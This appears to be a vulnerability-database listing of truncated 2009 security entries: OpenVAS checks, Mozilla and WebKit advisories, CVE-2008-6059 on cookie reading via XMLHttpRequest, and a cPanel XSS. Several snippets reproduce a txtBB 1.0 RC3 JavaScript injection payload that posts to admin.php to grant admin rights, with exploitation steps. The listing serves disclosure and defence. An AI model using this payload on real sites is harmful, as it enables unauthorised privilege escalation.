Ubuntu: Security Advisory (USN-690-3)

The remote host is missing an update for the SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Cpanel File Manager Cross Site Scripting

Cpanel File Manager XSS Vulnerability Synopsis ------------- Cpanel www.cpanel.net has two file manager application, standard and legacy one to manage files. Both of them are vulnerable to XSS attack. File name is presented unescaped so that an attacker can craft malicious file name to execute...

Mozilla Firefox Multiple Vulnerabilities (Feb 2009) - Windows

Mozilla Firefox browser is prone to multiple vulnerabilities. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Mozilla Seamonkey Multiple Vulnerabilities Feb-09 (Windows)

The host is installed with Mozilla Seamonkey browser and is prone to multiple vulnerabilities. OpenVAS Vulnerability Test $Id: secpodseamonkeymultvulnfeb09win.nasl 5122 2017-01-27 12:16:00Z teissa $ Mozilla Seamonkey Multiple Vulnerabilities Feb-09 Windows Authors: Sharath S Copyright: Copyright ...

Mozilla Firefox Multiple Vulnerabilities Feb-09 (Linux)

The host is installed with Mozilla Firefox browser and is prone to multiple vulnerabilities. OpenVAS Vulnerability Test $Id: secpodfirefoxmultvulnfeb09lin.nasl 5055 2017-01-20 14:08:39Z teissa $ Mozilla Firefox Multiple Vulnerabilities Feb-09 Linux Authors: Sharath S Copyright: Copyright c 2009...

Microsoft XML Core Services XMLHttpRequest SetCookie2头信息泄露漏洞

BUGTRAQ ID: 33803 CVECAN ID: CVE-2009-0419 Microsoft XML Core Services（MSXML）允许使用JScript、VBScript和Visual Studio 6.0的用户开发基于XML的应用，以与其他遵循XML 1.0标准的应用程序交互操作。 Microsoft XML Core Services没有正确地限制网页对Set-Cookie2 HTTP响应头的访问，远程攻击者可以通过XMLHttpRequest调用绕过HTTPOnly保护机制读取敏感信息。 Microsoft XML Core Services 6.0...

Microsoft XML Core Service Information Disclosure Vulnerability

This host is installed with Microsoft XML Core Service and is prone to information disclosure vulnerability. OpenVAS Vulnerability Test $Id: secpodmsxmlcoresvcinfodiscvuln.nasl 16112 2009-02-18 12:40:24Z feb$ Microsoft XML Core Service Information Disclosure Vulnerability Update by Antu sanadi on...

FreeBSD : firefox -- multiple vulnerabilities (8b491182-f842-11dd-94d9-0030843d3802)

Mozilla Foundation reports : MFSA 2009-06: Directives to not cache pages ignored MFSA 2009-05: XMLHttpRequest allows reading HTTPOnly cookies MFSA 2009-04: Chrome privilege escalation via local .desktop files MFSA 2009-03: Local file stealing with SessionStore MFSA 2009-02: XSS using a chrome XBL...

txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit

No description provided by source. !-- txtBB = 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit By cOndemned Greetz: ZaBeaTy, sid.psycho, Alfons Luja, vCore, irk4z & str0ke ; Exploitation: 1. Create an account 2. Go to http://host/txtbb10RC3path/index.php?type=account 3. Put exploit code...

Design/Logic Flaw

xml/XMLHttpRequest.cpp in WebCore in WebKit before r38566 does not properly restrict access from web pages to the 1 Set-Cookie and 2 Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly...

CVE-2008-6059

xml/XMLHttpRequest.cpp in WebCore in WebKit before r38566 does not properly restrict access from web pages to the 1 Set-Cookie and 2 Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly...

CVE-2008-6059

xml/XMLHttpRequest.cpp in WebCore in WebKit before r38566 does not properly restrict access from web pages to the 1 Set-Cookie and 2 Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly...

Mozilla Foundation Security Advisory 2009-05

Mozilla Foundation Security Advisory 2009-05 Title: XMLHttpRequest allows reading HTTPOnly cookies Impact: Low Announced: February 3, 2009 Reporter: Wladimir Palant Products: Firefox, SeaMonkey Fixed in: Firefox 3.0.6 SeaMonkey 1.1.15 Description Developer and Mozilla community member Wladimir...

CVE-2008-6059

CVE-2008-6059 affects WebKit’s WebCore (XMLHttpRequest.cpp) prior to r38566. The vulnerability allows remote attackers to read cookie data via XMLHttpRequest by not properly restricting web-page access to the Set-Cookie and Set-Cookie2 response headers, related to HTTPOnly protections. Impact is ...

Google Chrome Multiple Vulnerabilities (Feb-09)

This host is installed with Google Chrome and is prone to multiple vulnerabilities. OpenVAS Vulnerability Test $Id: gbgooglechromemultvuln.nasl 4869 2016-12-29 11:01:45Z teissa $ Google Chrome Multiple Vulnerabilities Feb-09 Authors: Sujit Ghosal Copyright: Copyright c 2009 Greenbone Networks Gmb...

Google Chrome Multiple Vulnerabilities (Feb 2009)

Google Chrome is prone to multiple vulnerabilities. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

txtBB 1.0 RC3 - HTMLJS Injection Arbitrary Add Admin Privileges

txtBB 1.0 RC3 - HTMLJS Injection Arbitrary Add Admin Privileges var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded';...

txtBB 1.0 RC3 Injection

var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded'; req.send'signature=&avatar=&type=3&password=&submit=Zapisz';...

CVE-2008-6059

xml/XMLHttpRequest.cpp in WebCore in WebKit before r38566 does not properly restrict access from web pages to the 1 Set-Cookie and 2 Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly...

txtBB 1.0 RC3 - HTML/JS Injection / Arbitrary Add Admin Privileges

var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded'; req.send'signature=&avatar=&type=3&password=&submit=Zapisz'; milw0rm.com 2009-02-05...